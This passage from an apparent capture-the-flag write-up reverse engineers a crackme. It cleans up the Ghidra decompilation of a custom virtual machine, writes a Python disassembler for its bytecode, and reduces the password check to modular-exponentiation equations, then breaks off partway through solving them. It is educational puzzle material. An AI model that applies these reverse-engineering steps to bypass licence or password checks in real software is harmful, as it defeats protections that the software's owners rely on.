<span class="n">do_xor_aX_bX</span><span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="p">(</span><span class="kt">long</span><span class="p">)</span><span class="n">a</span><span class="p">,</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="p">(</span><span class="kt">long</span><span class="p">)(</span><span class="kt">int</span><span class="p">)</span><span class="n">b</span><span class="p">,</span>
<span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="p">(</span><span class="kt">long</span><span class="p">)(</span><span class="kt">int</span><span class="p">)</span><span class="n">b</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="mh">0x3456789b</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x23456789</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_mov_aX_b</span><span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="p">(</span><span class="kt">long</span><span class="p">)</span><span class="n">a</span><span class="p">,(</span><span class="n">ulong</span><span class="p">)</span><span class="n">b</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="mh">0x2345678a</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x12345678</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_mov_aX_bX</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="mh">0x12345679</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x10fedcbb</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_sub_aX_bX</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="o">-</span><span class="mh">0x10fedcba</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x210fedcc</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_jnz_a</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="o">-</span><span class="mh">0x210fedcb</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x3210fedd</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_aX_pow_0x10001_mod_bX</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="o">-</span><span class="mh">0x3210fedc</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x43210fee</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_mov_DAT_0010506c_aX</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="o">-</span><span class="mh">0x43210fed</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x543210ff</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// WARNING: Subroutine does not return</span>
<span class="n">exit</span><span class="p">(</span><span class="n">DAT_0010506c</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o"><</span> <span class="o">-</span><span class="mh">0x543210fe</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x76543211</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_rol_aX_b</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x65432110</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_ror_aX_b</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">DATA_IP</span> <span class="o">+=</span> <span class="mi">3</span><span class="p">;</span>
<span class="p">}</span> <span class="k">while</span><span class="p">(</span> <span class="nb">true</span> <span class="p">);</span>
</code></pre></div></div>
<p><strong>All the <code class="highlighter-rouge"><</code> comparisons are compilation artifacts.</strong> The original
code probably had a <code class="highlighter-rouge">switch</code>/<code class="highlighter-rouge">case</code> and the compiler decided to
implement it as a balanced binary search over the case values to reduce the number of
comparisons needed for each <code class="highlighter-rouge">case</code>. We can safely remove them since
the <code class="highlighter-rouge">==</code> comparisons are sufficient.</p>
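<p>A minimal sketch of why dropping the ordering comparisons is safe, using the opcode constants from the listing above. The helpers <code class="highlighter-rouge">dispatch_flat</code> and <code class="highlighter-rouge">dispatch_tree</code> are made up for illustration and are not taken from the binary. The tree variant only uses ordering to decide which half to search, so both variants select the same case for every value:</p>

```python
# Opcode values as Ghidra prints them (signed 32-bit), sorted ascending.
OPCODES = sorted([
    0x789abcde, 0x6789abcd, 0x56789abc, 0x456789ab, 0x3456789a,
    0x23456789, 0x12345678, -0x10fedcbb, -0x210fedcc, -0x3210fedd,
    -0x43210fee, -0x543210ff, -0x76543211, -0x65432110,
])


def dispatch_flat(op):
    """Chain of == tests, like the cleaned-up decompilation."""
    for known in OPCODES:
        if op == known:
            return known
    return None


def dispatch_tree(op):
    """Binary search: ordering narrows the range, == makes the decision."""
    lo, hi = 0, len(OPCODES) - 1
    while lo <= hi:
        mid = (lo + hi) // 2
        if op == OPCODES[mid]:
            return OPCODES[mid]
        if op < OPCODES[mid]:
            hi = mid - 1
        else:
            lo = mid + 1
    return None


if __name__ == "__main__":
    # Known opcodes and a few unknown values behave identically.
    for op in OPCODES + [0, 1, -1, 0x7fffffff]:
        assert dispatch_flat(op) == dispatch_tree(op)
```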
<p>We also notice that some of the functions we know about (e.g.
<code class="highlighter-rouge">do_mov_aX_bX</code>) don’t seem to take the right number of
arguments. It’s hard for the decompiler to guess those in all
circumstances but we can help! With <code class="highlighter-rouge">right click > Edit Function Signature</code>
we can set the prototype we want for each of those functions.</p>
<p><strong>With those two things everything looks much cleaner:</strong></p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">do</span> <span class="p">{</span>
<span class="n">param_a</span> <span class="o">=</span> <span class="n">local_data</span><span class="p">[(</span><span class="n">DATA_IP</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)];</span>
<span class="n">param_b</span> <span class="o">=</span> <span class="n">local_data</span><span class="p">[(</span><span class="n">DATA_IP</span> <span class="o">+</span> <span class="mi">2</span><span class="p">)];</span>
<span class="n">op</span> <span class="o">=</span> <span class="n">local_data</span><span class="p">[</span><span class="n">DATA_IP</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x789abcde</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_cmp_ax_bx</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x6789abcd</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_jmp_a</span><span class="p">((</span><span class="n">param_a</span> <span class="o">+</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="mi">3</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x56789abc</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_jz_a</span><span class="p">((</span><span class="n">param_a</span> <span class="o">+</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="mi">3</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x456789ab</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_add_ax_bx</span>
<span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_a</span><span class="p">,</span>
<span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_b</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x3456789a</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_xor_ax_bx</span>
<span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_a</span><span class="p">,</span>
<span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_b</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x23456789</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_mov_ax_b</span>
<span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_a</span><span class="p">,</span>
<span class="n">param_b</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="mh">0x12345678</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_mov_ax_bx</span>
<span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_a</span><span class="p">,</span>
<span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_b</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x10fedcbb</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_sub_ax_bx</span>
<span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_a</span><span class="p">,</span>
<span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_b</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x210fedcc</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_jnz_a</span><span class="p">((</span><span class="n">param_a</span> <span class="o">+</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="mi">3</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x3210fedd</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_aX_pow_0x10001_mod_bX</span>
<span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_a</span><span class="p">,</span>
<span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_b</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x43210fee</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_mov_DATA_ax</span><span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_a</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x543210ff</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// WARNING: Subroutine does not return</span>
<span class="n">exit</span><span class="p">(</span><span class="n">DAT_0010506c</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x76543211</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_rol_ax_b</span><span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_a</span><span class="p">,</span>
<span class="n">param_b</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span> <span class="o">==</span> <span class="o">-</span><span class="mh">0x65432110</span><span class="p">)</span> <span class="p">{</span>
<span class="n">do_ror_ax_b</span><span class="p">(</span><span class="o">&</span><span class="n">DAT_00104060</span> <span class="o">+</span> <span class="n">param_a</span><span class="p">,</span>
<span class="n">param_b</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">DATA_IP</span> <span class="o">+=</span> <span class="mi">3</span><span class="p">;</span>
<span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="nb">true</span><span class="p">);</span>
</code></pre></div></div>
<p>Much more readable already!</p>
<p><strong>A couple things we learned from this:</strong></p>
<ul>
<li><code class="highlighter-rouge">DAT_0010506c</code> is the value with which the program will exit,
which means that <code class="highlighter-rouge">do_mov_DAT_0010506c_aX</code> can be renamed to
<code class="highlighter-rouge">do_mov_DAT_EXIT_aX</code> or <code class="highlighter-rouge">do_ldexit_aX</code>.</li>
<li>We now have a mapping between “instruction numbers” and functionality.</li>
<li>It looks like each instruction is encoded as three 4-byte words (<code class="highlighter-rouge">3 * 4 bytes</code>) in <code class="highlighter-rouge">local_data</code>.</li>
</ul>
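<p>To make the encoding concrete, here is a small sketch that decodes a single instruction and works out where a jump lands. The twelve bytes are the first instruction of the bytecode dump shown further down. The <code class="highlighter-rouge">jump_target</code> helper is hypothetical and assumes the jump handlers store their argument into <code class="highlighter-rouge">DATA_IP</code> unchanged, which the decompilation suggests but which I have not shown here:</p>

```python
import struct

# First 12 bytes of the bytecode: one opcode word and two argument words.
FIRST_INSTRUCTION = bytes.fromhex("896745230400000003000000")

# "<iii": three little-endian signed 32-bit integers (op, a, b).
op, a, b = struct.unpack("<iii", FIRST_INSTRUCTION)


def jump_target(param_a):
    """Word offset in local_data where execution resumes after a taken jump.

    The handler is called with (param_a - 1) * 3 and the main loop then
    adds 3, so we land on the first word of instruction number param_a.
    """
    data_ip = (param_a - 1) * 3  # value passed to do_jmp_a / do_jz_a / do_jnz_a
    data_ip += 3                 # DATA_IP += 3 at the bottom of the loop
    return data_ip


if __name__ == "__main__":
    print(hex(op), a, b)
    print(jump_target(4))
```

<p>In other words, jump arguments are instruction numbers, not word offsets, which is why the handlers receive <code class="highlighter-rouge">(param_a - 1) * 3</code>.</p>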
<h2 id="getting-the-code">Getting the code</h2>
<p>At this point we could attach gdb, set a breakpoint once we know
<code class="highlighter-rouge">local_data</code> has been initialized, and dump the instructions from there.</p>
<p>Or we could read the RTFM (rest of fucking main) and learn that it’s being
loaded from global memory. The relevant code:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">puVar4</span> <span class="o">=</span> <span class="o">&</span><span class="n">DAT_00102020</span><span class="p">;</span>
<span class="n">puVar5</span> <span class="o">=</span> <span class="n">local_data</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="n">lVar3</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">lVar3</span> <span class="o">+=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="o">*</span><span class="n">puVar5</span> <span class="o">=</span> <span class="o">*</span><span class="n">puVar4</span><span class="p">;</span>
<span class="n">puVar4</span> <span class="o">=</span> <span class="n">puVar4</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">puVar5</span> <span class="o">=</span> <span class="n">puVar5</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Either way we find the code and we can start writing a quick
disassembler for the operations we know about:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span>
<span class="kn">import</span> <span class="nn">struct</span>
<span class="n">DATA_CODE</span> <span class="o">=</span> <span class="nb">bytes</span><span class="o">.</span><span class="n">fromhex</span><span class="p">(</span>
<span class="s">"896745230400000003000000cdab8967040000000000000012f0debcff030000"</span>
<span class="s">"0000000001efcdab000000000000000089674523050000000100010089674523"</span>
<span class="s">"00010000fa20140389674523000200002d74c77789674523010100006bda742b"</span>
<span class="s">"89674523010200002de3617d8967452302010000bf8286638967452302020000"</span>
<span class="s">"19bc4d7b896745230301000021d7415989674523030200005f6ec26289674523"</span>
<span class="s">"04010000bb41ed5c8967452304020000f79364682301efcd1000000000020000"</span>
<span class="s">"debc9a7810000000000100003412f0de02000000000000002301efcd11000000"</span>
<span class="s">"01020000debc9a7811000000010100003412f0de02000000000000002301efcd"</span>
<span class="s">"1200000002020000debc9a7812000000020100003412f0de0200000000000000"</span>
<span class="s">"2301efcd1300000003020000debc9a7813000000030100003412f0de02000000"</span>
<span class="s">"000000002301efcd1400000004020000debc9a7814000000040100003412f0de"</span>
<span class="s">"020000000000000089674523ff03000001000000cdab89670200000000000000"</span>
<span class="p">)</span>
<span class="k">def</span> <span class="nf">arg</span><span class="p">(</span><span class="n">x</span><span class="p">):</span>
<span class="s">"""Represent a direct argument."""</span>
<span class="k">return</span> <span class="s">"</span><span class="si">%#</span><span class="s">x"</span> <span class="o">%</span> <span class="n">x</span>
<span class="k">def</span> <span class="nf">argX</span><span class="p">(</span><span class="n">x</span><span class="p">):</span>
<span class="s">"""Represent a de-referenced argument."""</span>
<span class="k">return</span> <span class="s">"[</span><span class="si">%#</span><span class="s">x]"</span> <span class="o">%</span> <span class="n">x</span>
<span class="k">def</span> <span class="nf">noarg</span><span class="p">(</span><span class="n">x</span><span class="p">):</span>
<span class="s">"""Represent the absence of argument."""</span>
<span class="k">return</span> <span class="s">""</span>
<span class="n">OP_MAP</span> <span class="o">=</span> <span class="p">{</span>
<span class="mh">0x789abcde</span><span class="p">:</span> <span class="p">(</span><span class="s">"cmp"</span><span class="p">,</span> <span class="n">argX</span><span class="p">,</span> <span class="n">argX</span><span class="p">),</span>
<span class="mh">0x6789abcd</span><span class="p">:</span> <span class="p">(</span><span class="s">"jmp"</span><span class="p">,</span> <span class="n">arg</span><span class="p">,</span> <span class="n">noarg</span><span class="p">),</span>
<span class="mh">0x56789abc</span><span class="p">:</span> <span class="p">(</span><span class="s">"jz"</span><span class="p">,</span> <span class="n">arg</span><span class="p">,</span> <span class="n">noarg</span><span class="p">),</span>
<span class="mh">0x456789ab</span><span class="p">:</span> <span class="p">(</span><span class="s">"add"</span><span class="p">,</span> <span class="n">argX</span><span class="p">,</span> <span class="n">argX</span><span class="p">),</span>
<span class="mh">0x3456789a</span><span class="p">:</span> <span class="p">(</span><span class="s">"xor"</span><span class="p">,</span> <span class="n">argX</span><span class="p">,</span> <span class="n">argX</span><span class="p">),</span>
<span class="mh">0x23456789</span><span class="p">:</span> <span class="p">(</span><span class="s">"mov"</span><span class="p">,</span> <span class="n">argX</span><span class="p">,</span> <span class="n">arg</span><span class="p">),</span>
<span class="mh">0x12345678</span><span class="p">:</span> <span class="p">(</span><span class="s">"mov"</span><span class="p">,</span> <span class="n">argX</span><span class="p">,</span> <span class="n">argX</span><span class="p">),</span>
<span class="o">-</span><span class="mh">0x10fedcbb</span><span class="p">:</span> <span class="p">(</span><span class="s">"sub"</span><span class="p">,</span> <span class="n">argX</span><span class="p">,</span> <span class="n">argX</span><span class="p">),</span>
<span class="o">-</span><span class="mh">0x210fedcc</span><span class="p">:</span> <span class="p">(</span><span class="s">"jnz"</span><span class="p">,</span> <span class="n">arg</span><span class="p">,</span> <span class="n">noarg</span><span class="p">),</span>
<span class="o">-</span><span class="mh">0x3210fedd</span><span class="p">:</span> <span class="p">(</span><span class="s">"powmod"</span><span class="p">,</span> <span class="n">argX</span><span class="p">,</span> <span class="n">argX</span><span class="p">),</span>
<span class="o">-</span><span class="mh">0x43210fee</span><span class="p">:</span> <span class="p">(</span><span class="s">"ldexit"</span><span class="p">,</span> <span class="n">argX</span><span class="p">,</span> <span class="n">noarg</span><span class="p">),</span>
<span class="o">-</span><span class="mh">0x543210ff</span><span class="p">:</span> <span class="p">(</span><span class="s">"exit"</span><span class="p">,</span> <span class="n">noarg</span><span class="p">,</span> <span class="n">noarg</span><span class="p">),</span>
<span class="o">-</span><span class="mh">0x76543211</span><span class="p">:</span> <span class="p">(</span><span class="s">"rol"</span><span class="p">,</span> <span class="n">argX</span><span class="p">,</span> <span class="n">arg</span><span class="p">),</span>
<span class="o">-</span><span class="mh">0x65432110</span><span class="p">:</span> <span class="p">(</span><span class="s">"ror"</span><span class="p">,</span> <span class="n">argX</span><span class="p">,</span> <span class="n">arg</span><span class="p">),</span>
<span class="p">}</span>
<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
<span class="c1"># Loop over DATA_CODE in chunks of 3*4 bytes because we will load
</span> <span class="c1"># the op and the two args which are four bytes each.
</span> <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">ci</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">DATA_CODE</span><span class="p">),</span> <span class="mi">3</span><span class="o">*</span><span class="mi">4</span><span class="p">)):</span>
<span class="n">op</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">unpack</span><span class="p">(</span><span class="s">"iii"</span><span class="p">,</span> <span class="n">DATA_CODE</span><span class="p">[</span><span class="n">ci</span><span class="p">:</span><span class="n">ci</span><span class="o">+</span><span class="mi">3</span><span class="o">*</span><span class="mi">4</span><span class="p">])</span>
<span class="n">op</span><span class="p">,</span> <span class="n">rep_a</span><span class="p">,</span> <span class="n">rep_b</span> <span class="o">=</span> <span class="n">OP_MAP</span><span class="p">[</span><span class="n">op</span><span class="p">]</span>
<span class="k">print</span><span class="p">(</span><span class="s">"</span><span class="si">%2</span><span class="s">d: </span><span class="si">%8</span><span class="s">s </span><span class="si">%8</span><span class="s">s </span><span class="si">%</span><span class="s">s"</span> <span class="o">%</span> <span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="n">op</span><span class="p">,</span> <span class="n">rep_a</span><span class="p">(</span><span class="n">a</span><span class="p">),</span> <span class="n">rep_b</span><span class="p">(</span><span class="n">b</span><span class="p">)))</span>
</code></pre></div></div>
<p>This program when run gives us a nice idea of what we are looking at.</p>
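<p>The negative keys in <code class="highlighter-rouge">OP_MAP</code> can look odd at first. Ghidra prints the constants as signed 32-bit values, and the <code class="highlighter-rouge">i</code> format used with <code class="highlighter-rouge">struct.unpack</code> decodes them the same way, so the lookups line up. The sketch below shows the same word in both views; <code class="highlighter-rouge">to_unsigned</code> and <code class="highlighter-rouge">to_signed</code> are illustrative helpers, not part of the script above:</p>

```python
import struct


def to_unsigned(value):
    """Reinterpret a signed 32-bit value as unsigned."""
    return value & 0xffffffff


def to_signed(value):
    """Reinterpret an unsigned 32-bit value as signed."""
    return struct.unpack("<i", struct.pack("<I", value))[0]


# The powmod opcode as it appears in the raw bytecode bytes.
RAW_POWMOD = bytes.fromhex("2301efcd")

as_signed = struct.unpack("<i", RAW_POWMOD)[0]    # what Ghidra shows
as_unsigned = struct.unpack("<I", RAW_POWMOD)[0]  # what a hex dump suggests

if __name__ == "__main__":
    print(hex(as_signed), hex(as_unsigned))
```

<p>Writing the byte order explicitly (<code class="highlighter-rouge">"&lt;i"</code>) also keeps the decoding independent of the machine the script runs on.</p>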
<h2 id="understanding-the-code">Understanding the code</h2>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~/Projects/ctf/rtfm$ ./writeup.py
0: mov [0x4] 0x3
1: jmp 0x4
2: ldexit [0x3ff]
3: exit
4: mov [0x5] 0x10001
5: mov [0x100] 0x31420fa
6: mov [0x200] 0x77c7742d
7: mov [0x101] 0x2b74da6b
8: mov [0x201] 0x7d61e32d
9: mov [0x102] 0x638682bf
10: mov [0x202] 0x7b4dbc19
11: mov [0x103] 0x5941d721
12: mov [0x203] 0x62c26e5f
13: mov [0x104] 0x5ced41bb
14: mov [0x204] 0x686493f7
15: powmod [0x10] [0x200]
16: cmp [0x10] [0x100]
17: jnz 0x2
18: powmod [0x11] [0x201]
19: cmp [0x11] [0x101]
20: jnz 0x2
21: powmod [0x12] [0x202]
22: cmp [0x12] [0x102]
23: jnz 0x2
24: powmod [0x13] [0x203]
25: cmp [0x13] [0x103]
26: jnz 0x2
27: powmod [0x14] [0x204]
28: cmp [0x14] [0x104]
29: jnz 0x2
30: mov [0x3ff] 0x1
31: jmp 0x2
</code></pre></div></div>
<p>Reading this it looks like we always end up jumping to <code class="highlighter-rouge">0x2</code>, which
does <code class="highlighter-rouge">ldexit [0x3ff]</code> followed by <code class="highlighter-rouge">exit</code> with that value.</p>
<p>Since we still don’t know where we’re going to get the flag the best
we can do is try to exit with a non-zero value. (Since when we input
garbage as a password the program exits with status code 0.)</p>
<p>The only way to do that is on line <code class="highlighter-rouge">30:</code> when <code class="highlighter-rouge">0x1</code> is loaded into
<code class="highlighter-rouge">[0x3ff]</code> so the goal becomes to get there.</p>
<p>To do so we need to successfully avoid all the <code class="highlighter-rouge">jnz</code> before that.</p>
<p><strong>Re-ordering the code for clarity we get:</strong></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 5: mov [0x100] 0x31420fa
6: mov [0x200] 0x77c7742d
15: powmod [0x10] [0x200]
16: cmp [0x10] [0x100]
17: jnz 0x2
7: mov [0x101] 0x2b74da6b
8: mov [0x201] 0x7d61e32d
18: powmod [0x11] [0x201]
19: cmp [0x11] [0x101]
20: jnz 0x2
9: mov [0x102] 0x638682bf
10: mov [0x202] 0x7b4dbc19
21: powmod [0x12] [0x202]
22: cmp [0x12] [0x102]
23: jnz 0x2
11: mov [0x103] 0x5941d721
12: mov [0x203] 0x62c26e5f
24: powmod [0x13] [0x203]
25: cmp [0x13] [0x103]
26: jnz 0x2
13: mov [0x104] 0x5ced41bb
14: mov [0x204] 0x686493f7
27: powmod [0x14] [0x204]
28: cmp [0x14] [0x104]
29: jnz 0x2
</code></pre></div></div>
<p>We know that <code class="highlighter-rouge">powmod</code> is <code class="highlighter-rouge">a ** 0x10001 % b</code> so this gives us:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x031420fa == [0x10] ** 0x10001 % 0x77c7742d
0x2b74da6b == [0x11] ** 0x10001 % 0x7d61e32d
0x638682bf == [0x12] ** 0x10001 % 0x7b4dbc19
0x5941d721 == [0x13] ** 0x10001 % 0x62c26e5f
0x5ced41bb == [0x14] ** 0x10001 % 0x686493f7
</code></pre></div></div>
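<p>As a sanity check, the five <code class="highlighter-rouge">powmod</code>/<code class="highlighter-rouge">cmp</code>/<code class="highlighter-rouge">jnz</code> triples can be mirrored in a few lines of Python. This is a sketch under two assumptions of mine: that <code class="highlighter-rouge">powmod</code> writes its result back into its first operand, and that <code class="highlighter-rouge">cmp</code> followed by <code class="highlighter-rouge">jnz</code> means “bail out if not equal”. The name <code class="highlighter-rouge">passes</code> is made up:</p>

```python
E = 0x10001

# (expected value, modulus) for memory cells 0x10 through 0x14, in order.
CHECKS = [
    (0x031420fa, 0x77c7742d),
    (0x2b74da6b, 0x7d61e32d),
    (0x638682bf, 0x7b4dbc19),
    (0x5941d721, 0x62c26e5f),
    (0x5ced41bb, 0x686493f7),
]


def passes(words):
    """Return True if every word survives its powmod/cmp/jnz triple."""
    if len(words) != len(CHECKS):
        return False
    return all(
        pow(word, E, modulus) == expected
        for word, (expected, modulus) in zip(words, CHECKS)
    )


if __name__ == "__main__":
    # Garbage in the five cells fails the very first comparison.
    print(passes([0, 0, 0, 0, 0]))
```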
<p>At this point I’m starting to assume that <code class="highlighter-rouge">0x10-0x14</code> will contain our
input in some form. So let’s solve these equations and see what gives.</p>
<p><em>Wait.</em> I’m <strong>bad</strong> at math.</p>
<p>https://www.wolframalpha.com/</p>
<p>But it doesn’t understand python. Rewrite everything to human-ish-speak.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>x ^ 65537 = 51650810 mod 2009560109
x ^ 65537 = 729078379 mod 2103567149
x ^ 65537 = 1669759679 mod 2068691993
x ^ 65537 = 1497487137 mod 1656909407
x ^ 65537 = 1559052731 mod 1751421943
</code></pre></div></div>
<p>Copy pasting the above (line by line) in
<a href="https://www.wolframalpha.com/">wolfram</a> we get back:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>x congruent 1936287603 (mod 2009560109)
x congruent 1701279355 (mod 2103567149)
